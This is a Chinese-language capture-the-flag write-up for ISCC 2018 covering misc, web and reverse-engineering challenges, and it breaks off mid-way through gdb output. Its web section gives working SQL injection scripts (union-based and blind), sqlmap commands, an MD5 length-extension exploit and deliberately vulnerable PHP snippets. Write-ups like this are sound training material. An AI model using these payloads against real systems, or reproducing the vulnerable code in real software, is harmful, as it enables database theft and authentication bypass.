題解部分:Misc(除misc500)、Web(除Only Admin、Only admin can see flag、有種你來繞、試試看)、Reverse、Pwn、Mobilejavascript
# -*- coding: utf-8 -*- import binascii import struct crc32key = 0x402E2D95 width = '\x00\x00\x02\x72' for i in range(256, 65535): height = struct.pack('>i', i) #CRC: 9A768270 data = '\x49\x48\x44\x52' + width + height + '\x08\x06\x00\x00\x00' crc32result = binascii.crc32(data) & 0xffffffff if crc32result == crc32key: print ''.join(map(lambda c: "%02X" % ord(c), height)) #height = '\x00\x00\x02\x72'
flag:it's easy!github
搜了一下這串的頭,發現是AES加密,不須要密碼,在線解密 獲得
答案就是後面這句但已加密 缽娑遠吶者若奢顛悉吶集梵提梵蒙夢怯倒耶哆般究有慄
>>> from HTMLParser import HTMLParser >>> h = HTMLParser() >>> h.unescape('''\u0066\u006c\u0061\u0067& #92;u007b\u0069\u0073\u0063\u00 ;63\u0020\u0069\u0073\u0020\u0066\u0075\u006e\u007d''') u'\\u0066\\u006c\\u0061\\u0067\\u007b\\u0069\\u0073\\u0063\\u0063\\u0020\\u0069\\u0073\\u0020\\u0066\\u0075\\u006e\\u007d' >>> h.unescape('''\u0066\u006c\u0061\u0067& #92;u007b\u0069\u0073\u0063\u0063\u0020\u0069\u0073\u0020\ 17;0066\u0075\u006e\u007d''').decode('unicode-esca pe').encode('utf-8') 'flag{iscc is fun}'
發現是firework處理的,用adobe firework打開,發現有不少二維碼碎片,拼接獲得二維碼。
import base64 import libnum s = 0x523156615245644E536C564856544E565130354B553064524D6C524E546B4A56535655795645644F5530524857544A4553553943566B644A4D6C524E546C7052523155795645744F536C5248515670555330354452456456576B524854554A585231457956554E4F51305A4855544E4553303153566B64424D6C524A546B7058527A525A5245744F576C5A4854544A5554553554513063304E46524C54564A5652316B795255744F51305A4856544E5554564661566B6C464D6B5252546B70595231557A5245394E516C5A4856544A555355354B566B644E5756524E5455705752316B7A5255564F55305248566B465553564A4356306C4E4D6C524E546B4A565231557952453152556C564A56544A455555354B5530644E5756525054554A56523030795645314F516C5A4857544A4553303143566B64464D305648546B744352314A425645744F576C5A4855544A4651303543566B64564D6B524854554A555230557A52454E4F536C644855544A5554553543566B645A4D6B564A546C4E445231566152456C52576C5A4855544A5553303544516B64564D6C524C54564A55523045795245314F556C4A4856544E455355354B56556C564D6B564E546B70535230315A52457452536C564951544A555455354B565564535156524A54564A575230457956456C4E576C46485454525553303143566B6446576C564A54544A46 s = libnum.n2s(s) #print s s = base64.b64decode(s) s = base64.b32decode(s) #print s s = libnum.n2s(eval('0x'+s)) s = base64.b64decode(s) s = base64.b32decode(s) s = libnum.n2s(eval('0x'+s)) print s
從第一層解壓縮獲得兩個文件(2.zip和tips.txt),打開tips.txt看到第二層提示十位大小寫字母數字特殊符號構成的密碼 ,因而爆破是不可能了,嘗試明文攻擊。
Advanced ZIP Password Recovery statistics:
Encrypted ZIP-file:2018ISCC\misc\300\3\2.zip
Total passwords: 0
Total time: 3m 40s 724ms
Average speed (passwords per second): 0
Password for this file: Z!C@t#f$12
Password in HEX: 5a 21 43 40 74 23 66 24 31 32
根據題目描述,先在輸入框隨便輸入一個數字,提交響應是數字過小,因此輸入儘可能大的數,發現只能輸入3位,F12打開瀏覽器控制檯,在查看器中將 maxlength="3"刪掉,提交9999便可以拿到key
key is 768HKyu678567&*&K
<?php highlight_file('2.php'); $flag='{***************}'; if (isset($_GET['password'])) { if (strcmp($_GET['password'], $flag) == 0) die('Flag: '.$flag); else print 'Invalid password'; } ?>
Flag: ISCC{iscc_ef3w5r5tw_5rg5y6s3t3}
<?php include "flag.php"; if ($_SERVER["REQUEST_METHOD"] != "POST") die("flag is here"); if (!isset($_POST["flag"]) ) die($_403); foreach ($_GET as $k => $v){ $$k = $$v; } foreach ($_POST as $k => $v){ $$k = $v; } if ( $_POST["flag"] !== $flag ) die($_403); echo "flag: ". $flag . "\n"; die($_200); ?>
<!DOCTYPE html> <html lang="en"> <head> <title>導航頁</title> <meta charset="UTF-8"> </head> <body> <a href='index.php?f=articles&id=1'>ID: 1</href> </br> <a href='index.php?f=articles&id=2'>ID: 2</href> </br> <a href='index.php?f=articles&id=3'>ID: 3</href> </br> <a href='index.php?f=articles&id=4'>ID: 4</href> </br> </body> </html> <?php #ISCC{LFIOOOOOOOOOOOOOO} if(isset($_GET['f'])){ if(strpos($_GET['f'],"php") !== False){ die("error..."); } else{ include($_GET['f'] . '.php'); } } ?>
看題目意思就是要傳username和password兩個參數過去,嘗試用get方法傳參,收到的響應源碼是 Username is not right
Password is not numeric
,emmm,又是後臺源碼泄露<?php error_reporting(0); $flag = "***********"; if(isset($_GET['username'])){ if (0 == strcasecmp($flag,$_GET['username'])){ $a = fla; echo "very good!Username is right"; } else{ print 'Username is not right<!--index.php.txt-->';} }else print 'Please give me username or password!'; if (isset($_GET['password'])){ if (is_numeric($_GET['password'])){ if (strlen($_GET['password']) < 4){ if ($_GET['password'] > 999){ $b = g; print '<p>very good!Password is right</p>'; }else print '<p>Password too little</p>'; }else print '<p>Password too long</p>'; }else print '<p>Password is not numeric</p>'; } if ($a.$b == "flag") print $flag; ?>
<?php include "secret.php"; @$username=(string)$_POST['username']; function enc($text){ global $key; return md5($key.$text); } if(enc($username) === $_COOKIE['verify']){ if(is_numeric(strpos($username, "admin"))){ die($flag); } else{ die("you are not admin"); } } else{ setcookie("verify", enc("guest"), time()+60*60*24*7); setcookie("len", strlen($key), time()+60*60*24*7); } show_source(__FILE__);
#! /usr/bin/python2 # *__ coding: utf-8 __* import assassin_md5 #將Assassin大佬的代碼保存爲assassin_md5.py放到exp.py同一目錄下 import hashlib import urllib import requests #將哈希值分爲四段,並反轉該四字節爲小端序,做爲64第二次循環的輸入幻書 # 78cfc57d983b4a17e55828c001a3e781 s1 = 0x7dc5cf78 s2 = 0x174a3b98 s3 = 0xc02858e5 s4 = 0x81e7a301 secret = "a"*46 + "guest" secret_admin= secret +'\x80'+'\x00'*4+'\x98\x01'+'\x00'*6+"admin" r = assassin_md5.deal_rawInputMsg(secret_admin) inp = r[len(r)/2:] #咱們須要截斷的地方,也是咱們須要控制的地方 #print r #print inp #print urllib.urlencode({'username': secret_admin[46:]}) #print "getmein:"+assassin_md5.run_md5(s1,s2,s3,s4,inp) url = '' headers = {"Cookie": "verify="+assassin_md5.run_md5(s1,s2,s3,s4,inp), "len": "46"} data = {"username": str(secret_admin[46:])} res = requests.post(headers = headers, url = url, data = data) print res.content
$./hash_extender -d guest -s 78cfc57d983b4a17e55828c001a3e781 -f md5 -a admin --out-data-format=html -l 46 --quiet 5f585093a7fe86971766c3d25c43d0ebguest%80%00%00%00%00%98%01%00%00%00%00%00%00admin
題目已經說了是注入題,有隻有一個參數,因此注入點是肯定的,各類姿式試一遍,發現下面兩個輸入的結果不同,因此是寬字節注入 %df%27 && 1=2%23 %df%27 || 1=1%23
sqlmap -u --dbs sqlmap -u -D baji --tables sqlmap -u -D baji -T admins --columns sqlmap -u -D baji -T admins -C flag --dump
#! /usr/bin/python2 # *__ coding: utf-8 __* import requests from bs4 import BeautifulSoup #獲取數據庫名 url = " select 1,database(),3,4,5,6,7,8%23" res = requests.get(url) soup = BeautifulSoup(res.content, 'lxml') res = soup.find_all('tr')[0] print("database: " + str(res)[32:-10]) db = str(res)[32:-10] #獲取全部數據庫的表的總數 url = " select 1,database(),3,4,5,6,(select count(*) from information_schema.tables),8%23" res = requests.get(url) soup = BeautifulSoup(res.content, 'lxml') res = soup.find_all('tr')[1] print("tables_count: " + str(res)[33:-10]) count = int(str(res)[33:-10]) #遍歷全部表名,找出屬於當前數據庫的表 tableList = [] for i in range(count): print("\r[+] " + str(i) + "/" + str(count), end='') url = " select 1,database(),3,4,5,6,(select table_name from information_schema.tables limit " + str(i) + ",1),8%23" res = requests.get(url) soup = BeautifulSoup(res.content, 'lxml') res = soup.find_all('tr')[1] tb = str(res)[33:-10] url = " select 1,database(),3,4,5,6,(select count(*) from " + db + "." + tb + "),8%23" res = requests.get(url) if(len(res.content) < 2000): continue tableList.append(db + "." + tb) print("\n[OK] ", end='') print(tableList) #獲取字段總數 columnsList = [] url = " select 1,database(),3,4,5,6,(select count(*) from information_schema.columns),8%23" res = requests.get(url) soup = BeautifulSoup(res.content, 'lxml') res = soup.find_all('tr')[1] print("columns_count: " + str(res)[33:-10]) count = int(str(res)[33:-10]) #遍歷全部字段名,找出當前數據庫中存在的字段 for i in range(count): print("\r[+] " + str(i) + "/" + str(count), end='') url = " select 1,database(),3,4,5,6,(select column_name from information_schema.columns limit " + str(i) + ",1),8%23" res = requests.get(url) soup = BeautifulSoup(res.content, 'lxml') res = soup.find_all('tr')[1] cl = str(res)[33:-10] for tb in tableList: url = " select 1,database(),3,4,5,6,(select count(" + cl + ") from " + tb + "),8%23" res = requests.get(url) if(len(res.content) < 2000): continue else: columnsList.append(tb) columnsList.append(cl) res = requests.get(url) soup = BeautifulSoup(res.content, 'lxml') res = soup.find_all('tr')[1] clcount = int(str(res)[33:-10]) columnsList.append(clcount) print("\n[OK] ", end='') print(len(columnsList)) print(columnsList) #dump當前數據庫數據 for i in range(0, len(columnsList), 3): print("[+] " + str(i) + "/" + str(len(columnsList))) for j in range(columnsList[i + 2]): url = " select 1,database(),3,4,5,6,(select " + columnsList[i + 1] + " from " + columnsList[i] + " limit " + str(j) + ", 1),8%23" res = requests.get(url) if(len(res.content) < 2000): continue soup = BeautifulSoup(res.content, 'lxml') res = soup.find_all('tr')[1] print(columnsList[i], columnsList[i + 1], str(res)[33:-10])
<?php header("content-type:text/html;charset=utf-8"); if(isset($_POST['username'])&isset($_POST['password'])){ $username = $_POST['username']; $password = $_POST['password']; } else{ $username="hello"; $password="hello"; } if(md5($password) == 0){ echo "xxxxx"; } ?>
<?php include 'flag.php'; $a = @$_REQUEST['a']; @eval("var_dump($$a);"); show_source(__FILE__); ?>
var password = eval(function(p,a,c,k,e,r){e=String;if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'^$'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAiAHAAYQBzAHMAdwBvAHIAZAA6AHgAaQBuAHkAaQBqAGkALgBjAG8AbQAiACkAPAAvAHMAYwByAGkAcAB0AD4',[],1,''.split('|'),0,{}));
import requests import string dic = string.printable url = '' headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86; rv:59.0) Gecko/20100101 Firefox/59.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': '28', 'Cookie': 'PHPSESSID=rq3r0ek7jabavlv5bjntif8ul3', 'DNT': '1', 'Connection': 'keep-alive', 'Upgrade-Insecure-Requests': '1'} #username = '''admin' and if(ascii(substr(database(),{i},1))>{j},1,0)#''' % i,j #for i in range(20): # username = '''admin' and if(length(database())=%s, 1, 0)#''' % str(i) # data = {'username': username, # 'password': 'aaa'} # res = requests.post(headers = headers, url = url, data = data) # if('normal' in res.text): # dblen = i # break #print(dblen) dblen = 13 # #db = '' #for i in range(1, dblen + 1): # for j in dic: # username = '''admin' and if(substr(database(),%d,1)="%c", 1, 0)#''' % (i,j) # data = {'username': username, # 'password': 'aaa'} # res = requests.post(headers = headers, url = url, data = data) # if('normal' in res.text): # db += j # print(db) # break # #print(db) db = 'sqli_database' #for i in range(20): # username = '''admin' and if((select count(table_name) from information_schema.tables where table_schema="sqli_database")=%d, 1, 0)#''' % i # data = {'username': username, # 'password': 'aaa'} # res = requests.post(headers = headers, url = url, data = data) # if('normal' in res.text): # tbcount = i # break #print(tbcount) tbcount = 2 #tblen = [] #for i in range(tbcount): # for j in range(20): # username = '''admin' and if((select length(table_name) from information_schema.tables where table_schema="sqli_database" limit %d,1)=%d, 1, 0)#''' % (i, j) # data = {'username': username, # 'password': 'aaa'} # res = requests.post(headers = headers, url = url, data = data) # if('normal' in res.text): # tblen.append(j) # break # print(tblen) tblen = [4,4] # #tbnames = [] #for k in range(tbcount): # tb = '' # for i in range(1, tblen[k] + 1): # for j in dic: # username = '''admin' and if(substr((select table_name from information_schema.tables where table_schema="sqli_database" limit %d,1),%d,1)="%c", 1, 0)#''' % (k,i,j) # data = {'username': username, # 'password': 'aaa'} # res = requests.post(headers = headers, url = url, data = data) # if('normal' in res.text): # if(j == dic[-1]): # i = dblen + 1 # break # tb += j # print(tb) # break # tbnames.append(tb) # #print(tbnames) tbnames = ['news', 'user'] #colcount = [] #for tb in tbnames: # for i in range(50): # username = '''admin' and if((select count(column_name) from information_schema.columns where table_name="%s")=%d, 1, 0)#''' % (tb,i) # data = {'username': username, # 'password': 'aaa'} # res = requests.post(headers = headers, url = url, data = data) # if('normal' in res.text): # colcount.append(i) # print(i) # break #print(colcount) #colcount = [6, 45] # #collen = [] #for k in range(tbcount): # for i in range(colcount[k]): # for j in range(50): # username = '''admin' and if(length((select column_name from information_schema.columns where table_name="%s" limit %d,1))=%d, 1, 0)#''' % (tbnames[k], i, j) # data = {'username': username, # 'password': 'aaa'} # res = requests.post(headers = headers, url = url, data = data) # if('normal' in res.text): # collen.append(j) # break # print(collen) #exit() #collen = [5, 4, 30, 2, 4, 4, 4, 4, 8, 11, 11, 11, 11, 11, 9, 11, 13, 12, 9, 10, 15, 10, 10, 12, 10, 21, 16, 12, 15, 16, 16, 14, 19, 18, 16, 10, 12, 22, 8, 10, 11, 12, 13, 11, 15, 20, 6, 21, 8, 4, 2] # #colnames = [] #for k in range(tbcount): # for lm in range(colcount[k]): # col = '' # print(collen[lm]) # for i in range(1, collen[lm] + 1): # for j in dic: # username = '''admin' and if(substr((select column_name from information_schema.columns where table_name="%s" limit %d,1),%d,1)="%c", 1, 0)#''' % (tbnames[k], lm, i, j) # data = {'username': username, # 'password': 'aaa'} # res = requests.post(headers = headers, url = url, data = data) # if('normal' in res.text): # if(j == dic[-1]): # i = collen[lm] + 1 # break # col += j # print(tbnames[k], col) # break # colnames.append(tbnames[k] + ':' + col) # #print(colnames) #colnames = ['news:title', 'news:note', 'news:kjafuibafuohnuvwnruniguankacbh', 'news:id', 'news:date', 'news:text', 'user:host ', 'user:user', 'user:password ', 'user:se', 'user:inse', 'user:upda', 'user:dele', 'user:crea', 'user:drop_pri', 'user:reload_priv', 'user:shutdown_pr', 'user:process_pri', 'user:file_priv ', 'user:grant_priv ', 'user:reference', 'user:index_priv ', 'user:alter_priv ', 'user:show_db_priv', 'user:super_pri', 'user:create_tmp', 'user:lock_tables_pri', 'user:execute_pr', 'user:repl_slave', 'user:repl_client_', 'user:create_vie', 'user:show_view_priv ', 'user:create_routine_p', 'user:alter_routin', 'user:create_user_pri', 'user:event_priv ', 'user:trigger_priv ', 'user:create_tablesp', 'user:ssl_type ', 'user:ssl_cipher ', 'user:x509_issuer ', 'user:x509_subje', 'user:max_question', 'user:max_updates ', 'user:max_conn', 'user:max_user_c', 'user:plugin ', 'user:authenticati', 'user:username ', 'user:pass ', 'user:id '] for i in range(50): username = '''admin' and if(((select count(kjafuibafuohnuvwnruniguankacbh) from sqli_database.news))="%d", 1, 0)#''' % (i) data = {'username': username, 'password': 'aaa'} res = requests.post(headers = headers, url = url, data = data) if('normal' in res.text): datacount = i break print(datacount) #datacount = 1 for i in range(50): username = '''admin' and if(((select length(kjafuibafuohnuvwnruniguankacbh) from sqli_database.news))="%d", 1, 0)#''' % (i) data = {'username': username, 'password': 'aaa'} res = requests.post(headers = headers, url = url, data = data) if('normal' in res.text): datalen = i break print(datalen) flag = '' for i in range(1, datalen + 1): for j in dic: username = '''admin' and if(substr((select kjafuibafuohnuvwnruniguankacbh from sqli_database.news limit 0,1),%d,1)="%c", 1, 0)#''' % (i, j) data = {'username': username, 'password': 'aaa'} res = requests.post(headers = headers, url = url, data = data) if('normal' in res.text): flag += j break print(flag)
= =不明白rsa爲何要放到逆向裏
$openssl rsa -pubin -text -modulus -in ./public.key Public-Key: (256 bit) Modulus: 00:d9:9e:95:22:96:a6:d9:60:df:c2:50:4a:ba:54: 5b:94:42:d6:0a:7b:9e:93:0a:ff:45:1c:78:ec:55: d5:55:eb Exponent: 65537 (0x10001) Modulus=D99E952296A6D960DFC2504ABA545B9442D60A7B9E930AFF451C78EC55D555EB writing RSA key -----BEGIN PUBLIC KEY----- MDwwDQYJKoZIhvcNAQEBBQADKwAwKAIhANmelSKWptlg38JQSrpUW5RC1gp7npMK /0UceOxV1VXrAgMBAAE= -----END PUBLIC KEY----- $rsatool -n 98432079271513130981267919056149161631892822707167177858831841699521774310891 -p 302825536744096741518546212761194311477 -q 325045504186436346209877301320131277983 -e 65537 -v DER -o privkey.key Using (p, q) to initialise RSA instance n = d99e952296a6d960dfc2504aba545b9442d60a7b9e930aff451c78ec55d555eb e = 65537 (0x10001) d = 4547b732cbc3527104cb57c4728d6899b44c4994fae2713d6b594bc0f522a41 p = 302825536744096741518546212761194311477 (0xe3d213b0a3c9551f9fb1eb8d7c3daf35) q = 325045504186436346209877301320131277983 (0xf4897caaba80236bdc1b59385c4bf49f) dP = 14892453193253029554515379766076098477 (0xb342ea1b63c55825ba12d5b64ebc7ad) dQ = 49314546715988473539600683690526958771 (0x2519a2df68323ead839466a1e566e4b3) qInv = 202808955982661073098368600366992163939 (0x98939589a7919cfaf48f7486a78d8463) Saving PEM as privkey.key $for i in `ls encrypted*`;do openssl rsautl -decrypt -in $i -inkey ./privkey.key;done flag{3b6d3806-4b2b -11e7-95a0- 000c29d7e93d}
fujian cat decrypt.py #!/usr/bin/env python # -*- coding: utf-8 -*- __Auther__ = 'M4x' from Crypto.PublicKey import RSA from Crypto.Cipher import PKCS1_v1_5 from base64 import b64decode, b64encode with open("./privkey.key") as f: prikey = f.read() rsakey = RSA.importKey(prikey) cipher = PKCS1_v1_5.new(rsakey) flag = "" with open("./encrypted.message1") as f1, open("./encrypted.message2") as f2, open("./encrypted.message3") as f3: flag += cipher.decrypt(f1.read(), "ERROR") flag += cipher.decrypt(f2.read(), "ERROR") flag += cipher.decrypt(f3.read(), "ERROR") print flag.replace("\n", "") # flag{3b6d3806-4b2b-11e7-95a0-000c29d7e93d}
下載好文件後發現是upx的殼,upx -d直接脫掉後運行,發現是經典的check輸入的題目(做爲一個linuxer,首先用wine模擬運行了一下,這也爲我後來的解題減小了很多麻煩,後邊會說到)
ISCC2018_re150 [master●●] file leftleftrightright.exe leftleftrightright.exe: PE32 executable (console) Intel 80386, for MS Windows, UPX compressed ISCC2018_re150 [master●●] upx -d ./leftleftrightright.exe Ultimate Packer for eXecutables Copyright (C) 1996 - 2013 UPX 3.91 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 30th 2013 File size Ratio Format Name -------------------- ------ ----------- ----------- 18432 <- 10752 58.33% win32/pe leftleftrightright.exe Unpacked 1 file. ISCC2018_re150 [master●●] file leftleftrightright.exe leftleftrightright.exe: PE32 executable (console) Intel 80386, for MS Windows ISCC2018_re150 [master●●] chmod +x leftleftrightright.exe ISCC2018_re150 [master●●] ./leftleftrightright.exe 0009:fixme:msvcp:_Locinfo__Locinfo_ctor_cat_cstr (0x32fcbc 1 C) semi-stub aaaaaaa 0009:fixme:msvcp:_Locinfo__Locinfo_ctor_cat_cstr (0x32fd1c 1 C) semi-stub try again! 請按任意鍵繼續...%
if ( sub_401090(v16) || v15 < 0x1D || (v17 = "flag is right!", v15 > 0x1D) ) v17 = "try again!"; v18 = sub_401BF0(std::cout, v17, sub_401E30); std::basic_ostream<char,std::char_traits<char>>::operator<<(v18, v19); system("pause");
crash出現的緣由不難分析,此時[ds + 0x40600]是一個不可讀的地址,這時候想起來windows vitia(writeup用的是windows 2008 server)及其以上版本引入了aslr技術,致使程序載入的基址是隨機的,若是取值的地址是寫死的(好比這道題),就極可能跳到不可讀的地址,程序crash,細節能夠看這裏
- OD把代碼當成數據分析時,能夠選中,點退格讓OD從新分析
- ctrl + A能夠從新分析當前模塊的代碼,也能把誤識別的數據轉爲代碼
//check函數不會改變輸入 int __cdecl sub_401090(unsigned int a1) { int v1; // ecx const char *v3; // esi unsigned int v4; // edx bool v5; // cf unsigned __int8 v6; // al unsigned __int8 v7; // al unsigned __int8 v8; // al if ( !a1 ) return 0; v3 = "s_imsaplw_e_siishtnt{g_ialt}F"; v4 = a1 - 4; if ( a1 < 4 ) { LABEL_6: if ( v4 == -4 ) return 0; } else { while ( *(_DWORD *)v1 == *(_DWORD *)v3 ) { v1 += 4; v3 += 4; v5 = v4 < 4; v4 -= 4; if ( v5 ) goto LABEL_6; } } v5 = *(_BYTE *)v1 < (const unsigned __int8)*v3; if ( *(_BYTE *)v1 != *v3 ) return -v5 | 1; if ( v4 != -3 ) { v6 = *(_BYTE *)(v1 + 1); v5 = v6 < v3[1]; if ( v6 != v3[1] ) return -v5 | 1; if ( v4 != -2 ) { v7 = *(_BYTE *)(v1 + 2); v5 = v7 < v3[2]; if ( v7 != v3[2] ) return -v5 | 1; if ( v4 != -1 ) { v8 = *(_BYTE *)(v1 + 3); v5 = v8 < v3[3]; if ( v8 != v3[3] ) return -v5 | 1; } } } return 0; }
ISCC2018_re150 [master●●] cat solve.py #!/usr/bin/env python # -*- coding: utf-8 -*- __Auther__ = 'M4x' encrypt = "s_imsaplw_e_siishtnt{g_ialt}F" before = "abcdefghijklmnopqrstuvwxyzABC" after = "onpqmlrskjtuihvwgfxyedzAcbBCa" flag = [encrypt[after.find(c)] for c in before] print "".join(flag) ISCC2018_re150 [master●●] python solve.py Flag{this_was_simple_isnt_it} ISCC2018_re150 [master●●]
固定exe的裝載基址後,發現運行到cin時,程序又crash了,這時纔想到windows10下dll的裝載基址也是隨機的,經過比較aslr_disabler.exe處理先後的exe,發現只對pe頭的一個字段改了一位(能夠經過010 editor的compare功能看出),因而想到了兩種思路:
很明顯第一種方法得不償失,麻煩不說,頗有可能形成系統環境的崩潰。因而嘗試在OD調試的過程當中指定dll的基址,試了一下發現要改的地方太多,放棄了。這個時候想到用wine模擬時程序能夠正常運行,因而搜索了一下調試wine加載的程序的方法,google的全部結果都指向一個工具winedbg,按照man手冊的說明,還能夠以gdb模式啓動,嘗試了一下,發如今本身電腦上各類報錯,把patch後的exe發給一個用arch的大佬學弟試了一下,一次就成了(吐血),比較後發現是wine的版本問題,因而果斷卸載了apt安裝的2.0的wine,手動編譯了一個3.8的wine,而後winedbg --gdb ./leftleftrightright.exe,終於跑起來了,以後的方法就和使用ollydbg時同樣了,直接下斷點查看處理先後的字符串便可
題目描述: I think the math problem is too difficult for me.
第一眼看到math problem的時候就已經默默地掏出z3了,事實證實果真如此2333
Desktop file Reverse Reverse: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=20b7dc66633da72204852bf32a4e0c4ea46340b6, stripped Desktop ./Reverse ======================================= = Welcome to the flag access machine! = = Input the password to login ... = ======================================= aaaaaaaaaaaa Wrong password!
拖到IDA裏,F5能夠看出 sub_400766() 爲驗證輸入的函數,整理一下其代碼以下:
signed __int64 sub_400766() { signed __int64 result; // rax __int64 v1; // ST40_8 __int64 v2; // ST48_8 __int64 v16; // [rsp+20h] [rbp-60h] __int64 v20; // [rsp+28h] [rbp-58h] __int64 v24; // [rsp+30h] [rbp-50h] __int64 v28; // [rsp+38h] [rbp-48h] __int64 v7; // [rsp+50h] [rbp-30h] __int64 v8; // [rsp+58h] [rbp-28h] __int64 v9; // [rsp+60h] [rbp-20h] __int64 v10; // [rsp+68h] [rbp-18h] __int64 v11; // [rsp+70h] [rbp-10h] __int64 v12; // [rsp+78h] [rbp-8h] if ( strlen(s) != 32 ) return 0LL; v16 = *&s[16]; v20 = *&s[20]; v24 = *&s[24]; v28 = *&s[28]; if ( *&s[4] * *s - *&s[12] * *&s[8] != 2652042832920173142LL ) goto LABEL_15; if ( 3LL * *&s[8] + 4LL * *&s[12] - *&s[4] - 2LL * *s != 397958918 ) goto LABEL_15; if ( 3 * *s * *&s[12] - *&s[8] * *&s[4] != 3345692380376715070LL ) goto LABEL_15; if ( 27LL * *&s[4] + *s - 11LL * *&s[12] - *&s[8] != 40179413815LL ) goto LABEL_15; srand(*&s[8] ^ *&s[4] ^ *s ^ *&s[12]); v1 = rand() % 50; v2 = rand() % 50; v7 = rand() % 50; v8 = rand() % 50; v9 = rand() % 50; v10 = rand() % 50; v11 = rand() % 50; v12 = rand() % 50; if ( v28 * v2 + v16 * v1 - v20 - v24 != 61799700179LL || v28 + v16 + v24 * v8 - v20 * v7 != 48753725643LL || v16 * v9 + v20 * v10 - v24 - v28 != 59322698861LL || v24 * v12 + v16 - v20 - v28 * v11 != 51664230587LL ) { LABEL_15: result = 0LL; } else { result = 1LL; } return result; }
- 首先能夠看出s是32位的char類型,在s上y一下,修改其變量類型爲char s[32],從新f5,一些讓人頭大的全局變量就被識別爲s的元素了
- 右鍵,hide casts,此時的代碼已經和純C差很少了
- n重命名變量,有助於分析
- 若是不肯定相似 v16 = *&s[16];等語句的功能,能夠調試一下快速肯定
Desktop cat iscc_re150.py #!/usr/bin/env python # -*- coding: utf-8 -*- __Auther__ = 'M4x' from z3 import * from libnum import n2s import ctypes from os import system # dll = ctypes.CDLL("/lib/x86_64-linux-gnu/libc.so.6") # v16 = BitVec('v16', 64) # v20 = BitVec('v20', 64) # v24 = BitVec('v24', 64) # v28 = BitVec('v28', 64) # v0 = BitVec('v0', 64) # v4 = BitVec('v4', 64) # v12 = BitVec('v12', 64) # v8 = BitVec('v8', 64) # s = Solver() # s.add(v4 * v0 - v12 * v8 == 2652042832920173142) # s.add(3 * v8 + 4 * v12 - v4 - 2 * v0 == 397958918) # s.add(3 * v0 * v12 - v8 * v4 == 3345692380376715070) # s.add(27 * v4 + v0 - 11 * v12 - v8 == 40179413815) # while s.check() == sat: # print s.model() # s.add(Or(s.model()[v0] != v0, s.model()[v4] != v4, s.model()[v8] != v8, s.model()[v12] != v12)) v4 = 1801073242 v0 = 1869639009 v8 = 829124174 v12 = 862734414 # v4 = 17606925155252157204 # v8 = 18136882180941875262 # v0 = 99182790156815694 # v12 = 4683719103566694143 # dll.srand(v8 ^ v4 ^ v0 ^ v12) # v1 = dll.rand() % 50; # v2 = dll.rand() % 50; # v7 = dll.rand() % 50; # v8 = dll.rand() % 50; # v9 = dll.rand() % 50; # v10 = dll.rand() % 50; # v11 = dll.rand() % 50; # v12 = dll.rand() % 50; # s.add(v28 * v2 + v16 * v1 - v20 - v24 == 61799700179) # s.add(v28 + v16 + v24 * v8 - v20 * v7 == 48753725643) # s.add(v16 * v9 + v20 * v10 - v24 - v28 == 59322698861) # s.add(v24 * v12 + v16 - v20 - v28 * v11 == 51664230587 ) # while s.check() == sat: # print s.model() # s.add(Or(s.model()[v16] != v16, s.model()[v20] != v20, s.model()[v24] != v24, s.model()[v28] != v28)) # [v16 = 811816014, # v20 = 9223372037683369038, # v24 = 1867395930, # v28 = 9223372038050563937] v16 = 811816014 v20 = 828593230 v24 = 1867395930 v28 = 1195788129 # [v16 = 9223372037666591822, # v20 = 4611686019255981134, # v24 = 9223372038722171738, # v28 = 4611686019623176033] # [v16 = 9223372037666591822, # v20 = 13835058056110756942, # v24 = 9223372038722171738, # v28 = 13835058056477951841] l = [v0, v4, v8, v12, v16, v20, v24, v28] flag = "" for i in l: flag += n2s(i)[::-1] print flag system("echo {}| ./Reverse".format(flag)) # flag{th3_Line@r_4lgebra_1s_d1fficult!}
- y指定fencode函數類型爲void __fastcall fencode(const char *input, char *output)可使input與output均已字符串的形式出如今僞代碼中
- 對於做用相同的局部變量,能夠在變量的定義處點=,讓變量map到其餘變量上,這樣代碼就不會太亂(但也要注意不是全部的變量都能map)
只有這兩處能對output產生影響,IDA中右鍵,Copy to assembly,查看彙編:
ISCC2018_re250 [master●●] cat payload 0123456789abcdefghijklmn ISCC2018_re250 [master●●] cat gdbscript b *0x4008c6 b *0x400906 r < ./payload i r edx esi eax ecx c i r edx esi eax ecx c i r edx esi eax ecx c i r edx esi eax ecx c i r edx esi eax ecx c i r edx esi eax ecx c i r edx esi eax ecx c i r edx esi eax ecx c i r edx esi eax ecx c i r edx esi eax ecx c i r edx esi eax ecx c i r edx esi eax ecx c i r edx esi eax ecx c i r edx esi eax ecx c i r edx esi eax ecx c i r edx esi eax ecx c i r edx esi eax ecx c i r edx esi eax ecx c i r edx esi eax ecx c i r edx esi eax ecx c i r edx esi eax ecx c i r edx esi eax ecx c i r edx esi eax ecx c i r edx esi eax ecx ISCC2018_re250 [master●●] gdb ./re -q pwndbg: loaded 165 commands. Type pwndbg [filter] for a list. pwndbg: created $rebase, $ida gdb functions (can be used with print/break) Reading symbols from ./re...BFD: /home/m4x/reverse_repo/ISCC2018_re250/re: invalid string offset 2425393296 >= 564 for section `.strtab' (no debugging symbols found)...done. pwndbg> source gdbscript Breakpoint 1 at 0x4008c6 Breakpoint 2 at 0x400906 Breakpoint 1, 0x00000000004008c6 in fencode () edx 0x2 2 esi 0x30 48 eax 0xffffdfe0 -8224 ecx 0x0 0 Breakpoint 1, 0x00000000004008c6 in fencode () edx 0x2 2 esi 0x31 49 eax 0xffffdfe0 -8224 ecx 0x1 1 Breakpoint 1, 0x00000000004008c6 in fencode () edx 0x4 4 esi 0x32 50 eax 0xffffdfe0 -8224 ecx 0x2 2 Breakpoint 1, 0x00000000004008c6 in fencode () edx 0xfffffffb -5 esi 0x33 51 eax 0xffffdfe0 -8224 ecx 0x3 3 